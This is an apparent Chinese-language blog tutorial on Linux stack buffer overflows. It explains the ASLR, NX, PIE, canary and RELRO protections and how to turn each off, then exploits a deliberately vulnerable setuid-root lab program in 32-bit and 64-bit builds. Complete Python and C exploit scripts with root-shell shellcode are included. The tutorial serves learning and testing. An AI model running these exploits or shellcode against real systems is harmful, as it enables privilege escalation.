缓冲区溢出漏洞原理及Linux下利用

已于 2022-07-07 14:28:01 修改
阅读量1.7w 收藏 17
点赞数 2
分类专栏: 渗透测试 文章标签: 缓冲区溢出 栈溢出 Linux 栈溢出 Linux32位栈溢出 Linux64位栈溢出
于 2021-12-26 19:43:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/122159453
版权

常见保护措施

ASLR

ASLR 是一种防范内存损坏漏洞被利用的计算机安全技术。ASLR通过随机放置进程关键数据区域的地址空间来防止攻击者能可靠地跳转到内存的特定位置来利用函数,以防范恶意程序对已知地址进行Return-to-libc攻击。ASLR在每次启动操作系统时会随机化加载应用程序的基地址和dll,只能随机化 堆、栈、共享库的基址。

Linux下查看:

cat /proc/sys/kernel/randomize_va_space

值为0表示未开启,值为1表示半开启,仅随机化栈和共享库,值为2表示全开启,随机化堆、栈和共享库

Windows下默认开启ASLR

关闭方法:

“开始”——>“设置”——>“更新与安全”——>“windows安全中心”——>“打开windows安全中心”——>“应用与浏览器控制”——>“Exploit Protection设置”

强制映像随机化默认关闭,只需关闭随机化内存分配和高熵ASLR即可,如图:

Untitled.png

使用CFF explorer,取消勾选"DLL can move"的复选框,如图:

Untitled2.png

修改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

关闭:"MoveImages"=dword:00000000

开启:"MoveImages"=-

DEP

数据执行保护(DEP)是一组对内存进行额外检查的硬件和软件技术,以帮助防止恶意代码在系统上运行。

NX

No-Execute(不可执行),NX的原理是将数据所在内存页标识为不可执行,当程序执行流被劫持到栈上时,程序会尝试在数据页面上执行指令,因为数据页被标记为不可知性,此时CPU就会抛出异常,而不是去执行栈上数据。

未启用时:栈可以执行,栈上的数据也可以被当作代码执行。

启用时:栈不可执行,栈上的数据程序只认为是数据,如果去执行的话会发生错误。即栈上的数据不可以被当作代码执行。

## 栈可执行:NX disabled
gcc -z execstack
## 栈不可执行:NX enabled(默认选项)
gcc -z noexecstack

PIE

PIE(Position Independent Executables)是编译器(gcc,…)功能选项(-fPIE / -fpie),作用于编译过程,可将其理解为特殊的 PIC(so专用,Position Independent Code),加了 PIE 选项编译出来的 ELF 用 file 命令查看会显示其为 so,其随机化了 ELF 装载内存的基址(代码段、plt、got、data 等共同的基址)。其效果为用 objdump、IDA 反汇编之后的地址是用偏移表示的而不是绝对地址。

启用时:代码段、plt、got、data 等共同的基址会随机化。在编译后的程序中,只保留指令、数据等的偏移,而不是绝对地址的形式。

## 关闭:No PIE(默认选项)
-no-pie
## 开启:PIE enabled
-fpie -pie / -fPIE -pie 
## 笔者并不知道这两个选项有什么区别,在用不同选项编译一个程序时他们两个的 hash 居然都一样,所以在此求教各位。

Canary

金丝雀保护,开启这个保护后,函数开始执行的时候会先往栈里插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法,如果不合法就停止程序运行。真正的 cookie 信息也会保存在程序的某个位置。插入栈中的 cookie 一般在 ebp/rbp 之上的一个内存单元保存。

部分函数保护:在一些容易受到攻击的函数返回地址之前添加 cookie 。在函数返回时,检查该 cookie 与原本程序插入该位置的 cookie 是否一致,若一致则程序认为没有受到栈溢出攻击。

所有函数保护:有的自定义函数在返回地址之前都会添加 cookie 。在函数返回时,检查该 cookie 与原本程序插入该位置的 cookie 是否一致,若一致则程序认为没有受到栈溢出攻击。

## 无 canary 保护:No canary found
-fno-stack-protector() / -fstack-protector()
## 部分 canary 保护:Canary found(默认选项)
-fstack-protector-strong
## 全部 canary 保护:Canary found
-fstack-protector-all

RELRO

设置符号重定位表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对 GOT 攻击。

未开启:在这种模式下关于重定位并不进行任何保护。

部分开启:在这种模式下,一些段 (包括.dynamic) 在初始化后将会被标识为只读。

全部开启:在这种模式下,除了会开启部分保护外。惰性解析会被禁用(所有的导入符号将在开始时被解析,.got.plt 段会被完全初始化为目标函数的终地址,并被标记为只读)。此外,既然惰性解析被禁用,GOT[1] 与 GOT[2] 条目将不会被初始化为提到的值。

## 关闭: No RELRO
-z norelro
## 开启: Partial RELRO(默认选项)
-z lazy
## 完全开启: Full RELRO
-z now

Linux下32位程序栈溢出

漏洞代码

#include <stdio.h>
#include <string.h>
void success()
{
    puts("Success!\n");
}
void vuln(char *p)
{
    char buff[100];
    char buff2[100];
    strcpy(buff,p);
}
int main(int argc, char **argv)
{
    if(argc<2)
    {
        printf("Usage: %s <String>\n",argv[0]);
        return 0;
    }
    vuln(argv[1]);
    return 0;
}

无保护编译

gcc pwn_1.c -o pwn_1 -m32 -z execstack -z norelro -no-pie

赋予程序特权

sudo chown 0:0 pwn_1
sudo chmod 4755 pwn_1

查看保护

程序为32位小端序,未启用任何保护,如图:
在这里插入图片描述

关闭操作系统ASLR

sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"

内存结构

b.png

Shellcode布局方式

1、Payload=填充数据+shellcode+填充数据+jmp eax地址
c.png
2、Payload=填充数据+jmp esp地址+ shellcode
d.png

定位溢出点

查看main函数:disassemble main
设置断点:b *0x0804918c(随便设置一个断点)

  1. 生成200个字符,如图:
    e.png

  2. 作为参数传入程序,使程序奔溃,此时EIP为的值为:daab,也就是EBP的下4个字节,如图:
    f.png

  3. 计算偏移量,如图:
    g.png

控制EIP

  1. 传入112个A字符和4个B字符覆盖EIP,和若干C字符,成功使用4个B字符覆盖EIP,此时字符C在ESP中,如图:
    h.png

  2. 查找success函数地址,将EIP的值覆盖为success函数的地址,从而调用success函数,如图:
    z.png
    i.png

定位shellcode空间

  1. 使用第一种shellcode布局方式部署shellcode,此时EAX到EDX都出现填充字节,如图:
    j.png

  2. 查看EAX寄存器的值发现shellcode,如图:
    k.png

  3. 使用第二种shellcode布局方式部署shellcode,此时ESP指向shellcode,如图:
    l.png

  4. 查看ESP寄存器的值发现shellcode,如图:
    m.png

检测坏字节

  1. 第一种shellcode布局方式下使用String+填充数据检测坏字节,没有坏字节的情况下数据没有被截断,会造成奔溃,如图:
    n.png

  2. 有坏字节的情况下数据被截断,不会造成奔溃,如图:
    o.png

  3. 第二种shellcode布局方式下使用填充数据+String检测坏字节,在0x08之后的数据被截断,说明坏字节是0x09,如图:
    p.png

  4. 0x1f之后的数据被截断,说明坏字节是0x20,如图:
    q.png

  5. 之后就没有坏字节了,如图:
    r.png

  6. 本程序中的坏字节如下:

0x00,0x09,0x0a,0x20

Get Shell

  1. 使用第一种布局方式时,覆盖EIP的值为EAX寄存器的地址即可执行shellcode,如图:
    s.png

  2. 查看程序汇编代码,查找跳转到EAX寄存器的指令地址,如图:
    t.png

  3. 覆盖EIP的值为call *%eax指令地址即可执行shellcode(可绕过操作系统ASLR),如图:
    在这里插入图片描述

  4. 使用第二种布局方式时,覆盖EIP的值为ESP寄存器的地址即可执行shellcode,如图:
    v.png

  5. 使用EDB打开程序,如图:
    w.png

  6. 运行之后查找jmp esp指令的地址,如图:
    x.png

  7. 覆盖EIP的值为jmp esp指令地址即可执行shellcode(可绕过操作系统ASLR),如图:
    y.png

EXP

第一种布局方式Python利用代码

#!/usr/bin/python3
from pwn import *
# 偏移量
offset=112
# call eax地址
eax=0x8049019
sc=b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
pad=b'\x90'*8+sc+b'\x90'*(offset-40)

buffer=pad+p32(eax)

p=process(['./pwn_1',buffer])
p.interactive()

第二种布局方式Python利用代码

#!/usr/bin/python3
from pwn import *

offset=112
esp=0x804a087
sc=b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
pad=b'\x90'*offset

buffer=pad+p32(esp)+sc

p=process(['./pwn_1',buffer])
p.interactive()

第一种布局方式C利用代码

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc,char **argv)
{
	// 偏移量
	int offset=112;
	// call eax地址
	char eax_addr[]="\x19\x90\x04\x08";
	// shellcode
	char sc[]="\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
	char buff[200];
	// 将buff全部设置为Nop
	memset(buff,0x90,200);
	// 在第8个字符后面放置shellcode
	memcpy(buff+8,sc,32);
	// 在第112个字符后放置call eax地址
	memcpy(buff+offset,eax_addr,4);
	// 运行第一个参数指向的程序,并将buff传入程序
	execl(argv[1],argv[1],buff,NULL);
	return 0;
}

第二种布局方式C利用代码

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc,char **argv)
{
	// 偏移量
	int offset=112;
	// jmp esp地址
	char esp_addr[]="\x87\xa0\x04\x08";
	// shellcode
	char sc[]="\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
	char buff[400];
	// 将buff全部设置为Nop
	memset(buff,0x90,400);
	// 在第112个字符后放置jmp esp地址
	memcpy(buff+offset,esp_addr,4);
	// 在第116个字符后面放置shellcode
	memcpy(buff+116,sc,32);
	
	// 运行第一个参数指向的程序,并将buff传入程序
	execl(argv[1],argv[1],buff,NULL);
	return 0;
}

Linux下64位程序栈溢出

32位和64位的区别

linux_64与linux_86的区别主要有两点:

  1. 首先是内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。
  2. 其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI, RSI, RDX, RCX, R8和 R9中,如果还有更多的参数的话才会保存在栈上。

漏洞代码

#include <stdio.h>
#include <string.h>
void success()
{
    puts("Success!\n");
}
void vuln(char *p)
{
    char buff[100];
    char buff2[100];
    strcpy(buff,p);
}
int main(int argc, char **argv)
{
    if(argc<2)
    {
        printf("Usage: %s <String>\n",argv[0]);
        return 0;
    }
    vuln(argv[1]);
    return 0;
}

无保护编译

gcc pwn_1.c -o pwn_1_x64 -m64 -z execstack -z norelro -no-pie

赋予程序特权

sudo chown 0:0 pwn_1_x64
sudo chmod 4755 pwn_1_x64

查看保护措施

Untitled.png

定位溢出点

  1. 生成200个字符传入使程序奔溃,此时RSP的值为RIP指向的地址,也就是函数返回地址,如图:
    a.png

  2. 计算RSP低地址位的4个字节获得偏移量,如图:
    b.png

控制RIP

  1. 传入120个A字符和8个B字符覆盖RIP,成功使用8个B字符覆盖RIP,如图:
    c.png

  2. 查找success函数地址,将RIP的值覆盖为success函数的地址,从而调用success函数
    `

r `python -c "print 'A'*120+'\x42\x11\x40'"`

d.png

定位shellcode空间

  1. 使用填充数据+shelcode+填充数据+RIP布局方式将Payload传入参数
r `python -c "print '\x90'*23+'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'+'\x90'*70+'\x50\xdf\xff\xff\xff\x7f'"`

  1. 程序奔溃时在RAX寄存器中发现填充数据,如图:
    e.png

  2. 查看RAX寄存器内容发现传入的shellcode,如图:
    f.png

检查坏字节

和32位程序检查坏字节的方法一样

Get Shell

  1. 覆盖RIP的值为RAX寄存器的地址即可执行shellcode,如图:
    g.png

  2. 查看程序汇编代码,查找跳转到RAX寄存器的指令地址,如图:
    h.png

  3. 覆盖RIP的值为callq *%rax指令地址即可执行shellcode(可绕过操作系统ASLR),不同的shellcode有不同的结果,可能无法获得root权限

./pwn_1_x64 `python -c "print '\x90'*27+'\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05'+'\x90'*50+'\x10\x10\x40'"`

i.png

EXP

Python利用代码

#!/usr/bin/python3
from pwn import *

# call rax地址
rax=b'\x10\x10\x40'
# 偏移量
offset=120
# 43字节可获得root权限的shellcode
sc=b'\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05'
pad=b'\x90'*27+sc+b'\x90'*(offset-27-43)

buff=pad+rax

ret=process(['./pwn_1_x64',buff])
ret.interactive()

C利用代码

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc,char **argv)
{
	// 偏移量
	int offset=120;
	// call rax地址
	char rax_addr[]="\x10\x10\x40";
	// shellcode
	char sc[]="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
	char buff[200];
	// 将buff全部设置为Nop
	memset(buff,0x90,200);
	// 在第8个字符后面放置shellcode
	memcpy(buff+8,sc,43);
	// 在第120个字符后放置call rax地址,长度4和8都可,不足4字节可以填4
	memcpy(buff+offset,rax_addr,4);
	// 运行第一个参数指向的程序,并将buff传入程序
	execl(argv[1],argv[1],buff,NULL);
	return 0;
}
江左盟宗主
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 内核地址随机化,关闭Linux 内存地址随机化机制
weixin_35513425的博客
04-29 1189
关闭Linux 内存地址随机化机制, 禁用进程地址空间随机化.可以将进程的mmap的基址,stack和vdso页面地址固定下来. 可以通过设置kernel.randomize_va_space内核参数来设置内存地址随机化的行为.目前randomize_va_space的值有三种,分别是[0,1,2]0 - 表示关闭进程地址空间随机化。1 - 表示将mmap的基址,stack和vdso页面随机化。2...
Python编写简单的防缓冲区溢出攻击代码
2401_82697976的博客
02-08 284
在这个程序中,我们使用`curses.wrapper()`函数来管理屏幕的初始化和清理。`main()`函数是我们的主程序,它显示一个提示,等待用户输入,然后显示用户输入的内容。我们使用`getch()`函数获取用户的输入,并使用`addstr()`函数在屏幕上显示文本。我们通过检查`getch()`函数的返回值来决定如何处理用户的输入。Python语言中,我们可以通过使用`curses`库来编写一个简单的防缓冲区溢出的程序。这个程序非常简单,但它演示了如何使用`curses`库来创建一个文本用户界面。
[操作系统安全]缓冲区溢出
Freedomhy的博客
04-17 1766
ebp和esp用于管理栈空间,ebp指向栈底,esp指向栈顶,代码区中的函数调用、返回和执行都伴随着不断的压栈和清栈,在调用函数时,ebp会指向Previous Frame Pointer以在执行函数之后返回到原来的地址。1、缓冲区溢出是因为在程序执行时数据的长度超出了预先分配的空间大小,导致覆盖了其他数据的分配区域,从而执行非授权指令,获取信息,取得系统特权进而进行各种非法操作导致程序运行失败、系统宕机、重新启动等后果。将得到的机器码添加到foo1()函数中,并执行,即可将攻击代码注入。
缓冲区溢出漏洞学习总结(漏洞原理及其利用方法)
最新发布
IronmanJay的博客
03-29 2289
本文将会介绍关于缓冲区溢出类型漏洞原理及其利用方法。因为缓冲区溢出漏洞是一个大类,这其中包含了很多种小类漏洞,故笔者专写下此篇博客,以记录自己在学习和内存相关的内容时的知识点记录以及心得体会。以下就是本篇博文的全部内容。
漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)
qq_50854662的博客
02-14 548
漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)
linux通信缓存溢出,Linux缓冲区溢出基础
weixin_39998881的博客
05-14 430
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?我们知道,缓冲区就是暂时放置数据的地方,也就是说缓冲区其实就是变量,在程序开发中为了增加用户体验,往往需要用户输入,而用户的输入是不可控的,如果我们在程序中设定的缓冲区大小为32字节,那么用户输入超过32字节会怎么样呢?这样就会引发一个缓冲区溢出。通过溢出缓冲区可以控制栈中的ebp、eip等,这样就可以让目标系统实现特定...
缓冲区溢出攻击原理+实例讲解
01-05
3. 1996年,Aleph One在Phrack杂志第49期发表的论文详细描述了Linux系统中栈的结构和如何利用基于栈的缓冲区溢出缓冲区溢出攻击防御方法: 1. 输入验证:对输入数据进行验证,防止恶意数据的输入。 2. 缓冲区...
缓冲区溢出原理和实践(Phrack)
03-02
简 介在过去的几个月中,被发现和利用缓冲区溢出漏洞呈现上升趋势.例如syslog,splitvt,sendmail8.7.5,Linux/FreeBSDmount,Xtlibrary,at等等.本文试图解释什么是缓冲区溢出,以及如何利用.汇编的基础知识是必需的.对...
实验 Linux 下的缓冲区溢出实践1
08-08
- 创建一个含有缓冲区溢出漏洞的程序。 - 观察溢出导致的程序行为变化。 - 设计并实现修复方案,以防止溢出。 5.2 实验步骤 1. 编写一个简单的程序,故意使缓冲区溢出。 2. 使用GDB进行调试,设置断点,观察溢出...
缓冲区溢出原理和实践.doc
03-30
6. **实例分析**:历史上有许多著名的缓冲区溢出案例,比如sendmail、Xt库、Linux/FreeBSD的mount命令等,这些漏洞曾被黑客广泛利用,导致服务器被远程控制。通过对这些案例的研究,我们可以学习如何识别和修复这类...
缓冲区溢出攻击
一个学生的博客
11-01 369
利用缓冲区溢出漏洞所进行的攻击行动。缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重新启动等后果。缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。
linux缓冲区溢出漏洞攻击文件
10-29
linux 缓冲区溢出 漏洞攻击 获取root权限 shell
缓存区溢出检测工具BED
04-12 479
缓存区溢出检测工具BED 缓存区溢出(Buffer Overflow)是一类常见的漏洞,广泛存在于各种操作系统和软件中。利用缓存区溢出漏洞进行攻击,会导致程序运行失败、系统崩溃。渗透测试人员利用这...
aslr_什么是ASLR,它如何确保计算机安全?
culinxia2707的博客
09-04 3696
aslrAddress Space Layout Randomization (ASLR) is a security technique used inoperating systems, first implemented in 2001. The current versions of all major operating systems (iOS, Android, Windows, ...
Linux缓冲区溢出攻击详解
Arshion的博客
10-21 2932
Linux缓冲区溢出攻击详解 (一)当一个函数被调用后,它会: 移动栈指针ESP,EBP。开辟一段栈空间 在栈(堆)空间内分配程序申请的局部变量 (二)当一个函数去调用另一个函数时,它会: 准备入口参数(形参压栈) 调用CALL指令 (三)当call指令执行时会发生什么? CALL指令下一条指令的地址会被压入栈 IP寄存器值发生改变,代码跳转至子程序*(IP如何变化?段间跳和跨段跳有所不同)* (四)call完之后进入子程序,子程序会做什么? 显然,它会做和(一)一样的事情。 详解:.
linux缓冲区溢出攻击原理及示例
么刚的专栏
11-07 6543
linux缓冲区溢出攻击原理及示例
缓冲区溢出漏洞
Masimaro的专栏
10-31 7164
缓冲区溢出的根本原因是冯洛伊曼体系的计算机并不严格的区分代码段和数据段,只是简单的根据eip的指向来决定哪些是代码,所以缓冲区溢出攻击都会通过某种方式修改eip的值,让其指向恶意代码。缓冲区溢出攻击一般分为堆缓冲区溢出攻击和栈缓冲区溢出攻击栈缓冲区溢出攻击栈缓冲区溢出攻击的一般是传入一个超长的带有shellcode的字符缓冲,覆盖栈中的EIP值,这样当函数执行完成返回后就会返回到有shellcode
(亲测)使用cmd结束进程的3种方法
热门推荐
望穿秋水见伊人的博客
06-06 21万+
有时候当我们想结束某个进程时发现打不开任务管理器,也许是后台运行负载,也者是病毒引起。今天秋水介绍一下不用任务管理器来结束进程。点击电脑桌面的左下角“开始”菜单或 windows键+R键输入cmd回车;输入tasklist回车以显示进程,如图:重要:同一个应用打开关闭再打开,pid会变化,所以每次操作前请获得最新的tasklist。方法一下面我们就是要结束想要禁止的进程,比如我要结束我的QQ,它的...
Linux漏洞】GNU Wget缓冲区溢出漏洞
pri_sta_pub的博客
04-20 377
GNU Wget是GNU计划开发的一套用于在网络上进行下载的自由软件,它支持通过HTTP、HTTPS以及FTP这三个最常见的TCP/IP协议下载。 GNU Wget 1.19.2之前的版本中存在缓冲区溢出漏洞。远程攻击者可利用漏洞在受影响的应用程序上下文中执行任意代码或造成拒绝服务。解决方案:登录服务器Wget版本(wget -v),1.19.2之前版本存在缓冲区溢出漏洞,更新到最新版本--&...
Introdução ao Buffer overflow 1.pdf
10-06
网络安全渗透测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值